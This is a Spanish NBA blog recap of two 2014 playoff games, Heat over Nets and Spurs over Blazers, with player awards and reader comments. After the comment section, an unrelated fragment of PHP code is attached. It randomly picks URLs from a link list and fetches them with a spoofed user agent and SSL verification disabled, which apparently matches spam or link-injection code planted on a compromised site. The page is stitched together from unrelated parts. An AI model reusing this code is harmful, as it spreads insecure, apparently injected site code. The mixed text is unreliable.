La Crónica: Coitus interruptus

07 de May de 2014 por txusma

Bajonazo en unos Playoffs que están resultando excitantes hasta el momento. Tanto Heat como Spurs pasaron por encima de sus respectivos rivales sin darles prácticamente oportunidades de conseguir dar la sorpresa.

Miami llevaba más de una semana descansando algo que muchos analistas apuntaban que podía resultar contraproducente y además se enfrentaban a un equipo que había conseguido ganarles en los cuatro enfrentamientos de regular season que habían disputado. A la hora de la verdad LeBron James y compañía se mostraron tan enchufados y motivados como siempre e impusieron su ley desde los primeros compases del partido. Llegaron a acumular una ventaja de 11 puntos durante el segundo cuarto que los Nets consiguieron neutralizar pero al inicio del tercer cuarto, un parcial de 24-9 liderado por Chris Bosh hizo saltar por los aires el partido y otorgó una importante ventaja a los locales que los de Brooklyn ya no se esforzaron en remontar (86-107).

En San Antonio el partido duró aún menos. Como hicieron un par de días antes frente los Mavericks, los Spurs prácticamente sentenciaron el partido en el primer cuarto de la mano nuevamente de un Tony Parker imperial que dejó en evidencia la defensa de Damian Lillard. El francés dio anoche otro recital por segundo partido consecutivo y su recuperación – ha estado missing en algunos partidos de la 1ª ronda – es la mejor noticia para los de Popovich. En el segundo cuarto la diferencia no hizo más que aumentar gracias a una buena aportación del banquillo y al descanso era ya de 26 puntos. Ni los esfuerzos de LaMarcus Aldridge consiguieron reducir la ventaja y los Spurs se dedicaron a controlar pacientemente el partido a la espera del final (92-116).  

PREMIOS

MVP: Segundo partido consecutivo de Tony Parker por encima de los 30 puntos. Anotó 33 y repartió 9 asistencias. Un LeBron James poco exigido anotó 22 puntos y cogió 5 rebotes.

Sorpresa: Tras prácticamente no existir en la 1ª ronda, el banquillo de los Spurs apareció frente los Blazers. Marco Bellinelli anotó 19 puntos, Aaron Baynes y Patty Mills 10 puntos cada uno.

Decepción: Una de cal y una de arena para los Spurs. Como hemos dicho el banco estuvo bien pero Danny Green y Manu Ginóbili no fueron capaces de anotar ninguna canasta en juego a pesar de intentarlo en 9 ocasiones. Otro que se quedó son anotar fue Kevin Garnett.

Esfuerzo en vano: LaMarcus Aldridge plantó a los Spurs con 32 puntos, 14 rebotes y 2 robos pero estuvo muy solo. No estuvo fino en el primer cuarto y cuando empezó a carburar los locales ya se habían ido en el marcador.

Imágenes | AP Photos / Getty Images

Comenta

2 comentarios a esta entrada

  1. Mamba_Blanca dice:
    #1

    Confirmado 100% los jugadores de la NBA leen TJNBA. Habéis nombrado a Bellinelli como una decepciones de primera ronda y se marca un partido de 19 ptos.

      Citar

  2. GreenPride dice:
    #2

    Partidos fáciles para los dos favoritos.
    En Miami los Nets se mostraron demasiado lentos y viejos para poder competir con LeBron y sus huestes. Victoria sin paliativos y la promesa de que o cambia mucho la cosa o será una serie corta.
    En el Oeste repaso de los Spurs a los jóvenes Blazers y muy en particular lección avanzada de Tony Parker a Lillard que no le vio en todo el partido. El banquillo de los Spurs es un trillón de veces mejor que el de Portland así que el tiempo que se juegue con la segunda unidad puede ser una masacre y más si Belinelli vuelve a ver aro. Todavía espero que los Blazers pongan en más problemas a los Spurs, a ver si se centran en el segundo partido y podemos ver una serie interesante.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>